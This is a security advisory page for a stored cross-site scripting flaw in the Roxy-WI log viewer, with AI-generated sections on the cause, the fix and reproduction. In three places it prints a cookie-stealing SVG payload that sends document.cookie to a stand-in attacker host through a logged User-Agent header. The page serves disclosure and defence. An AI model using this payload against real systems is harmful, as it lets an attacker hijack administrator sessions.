VYPR
← All advisories
Medium severity6.1NVD Advisory· Published Jun 10, 2026· Updated Jun 10, 2026

CVE-2026-45560

CVE-2026-45560

Description

Roxy-WI versions prior to 8.2.6.4 are vulnerable to stored XSS via log injection, allowing attackers to execute code in admin sessions.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Roxy-WI versions prior to 8.2.6.4 are vulnerable to stored XSS via log injection, allowing attackers to execute code in admin sessions.

Vulnerability

Roxy-WI versions 8.2.6.4 and prior contain a stored cross-site scripting (XSS) vulnerability in the log viewer functionality. The wrap_line and highlight_word functions in app/modules/common/common.py construct raw HTML via string concatenation without proper escaping. The frontend JavaScript then injects this unescaped HTML into the log viewer page using .html(data) or .append(data) [1].

Exploitation

An attacker can exploit this vulnerability by sending an HTTP request to a Roxy-WI managed HAProxy or Nginx server. The request's User-Agent header, or any other field that gets logged, can contain an SVG payload such as <svg/onload=fetch('https://attacker.example/x?c='+document.cookie)>. This malicious string is written into the server's access log. When a Roxy-WI administrator views the logs through the web interface, the embedded SVG payload is rendered and executed within the administrator's browser session [1].

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript code within the context of a Roxy-WI administrator's session. This leads to a full compromise of the application state, as the attacker gains the same privileges and access as the administrator. The stolen cookie may include session references, potentially enabling further escalation attacks [1].

Mitigation

At the time of publication, there are no publicly available patches for this vulnerability. The recommended fix involves using Jinja's auto-escaping for log content. Users are advised to monitor for updates from the vendor. This vulnerability is listed in the GitHub advisory [1].

References
  1. Stored XSS in log viewer (wrap_line/highlight_word produce unescaped HTML)

AI Insight generated on Jun 10, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

1

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The `wrap_line` and `highlight_word` functions construct HTML by concatenating strings without proper escaping, leading to cross-site scripting vulnerabilities."

Attack vector

An attacker can send an HTTP request to a Roxy-WI managed HAProxy or Nginx server, injecting malicious HTML, such as `<svg/onload=fetch('https://attacker.example/x?c='+document.cookie)>`, into a log field like the User-Agent. This payload is then written into the server's access logs. When a Roxy-WI administrator views these logs through the web interface, the injected SVG element is rendered, executing the JavaScript payload in the admin's browser context [ref_id=1].

Affected code

The vulnerability resides in the `wrap_line` and `highlight_word` functions located in `app/modules/common/common.py` at lines 181-192. These functions are called by `show_log` in `app/modules/roxywi/logs.py` to process log lines. The frontend JavaScript, particularly in `app/static/js/script.js` for log viewer paths, consumes this output unsafely using `.html(data)` or `.append(data)` [ref_id=1].

What the fix does

The advisory indicates that patches involve using Jinja's auto-escaping for log content and rendering via Jinja templates instead of direct string concatenation. Specifically, the `wrap_line` and `highlight_word` functions should escape both the content and CSS classes before returning them as `Markup` objects. The frontend should then use `.text()` and CSS classes instead of `.html()` or `.append()` to prevent arbitrary HTML injection [ref_id=1]. No patch is publicly available at the time of this report.

Preconditions

  • networkThe attacker must be able to send HTTP requests to the public-facing HAProxy/Nginx server managed by Roxy-WI.
  • inputThe attacker must be able to inject unescaped HTML into a field that gets logged by HAProxy/Nginx, such as the User-Agent header.
  • authNo authentication is required for the attacker to inject the payload into the logs.

Reproduction

As an attacker, send an HTTP request whose User-Agent (or any logged field) contains: User-Agent: <svg/onload="fetch('https://attacker.example/x?c='+document.cookie)">

The line lands in HAProxy/Nginx access log on a Roxy-WI-managed server. A Roxy-WI admin opens Logs → HAProxy → . The browser receives: <div class="line">… UA="<svg/onload=...>". The <svg> payload runs in the admin's session [ref_id=1].

Generated on Jun 10, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1

News mentions

0

No linked articles in our index yet.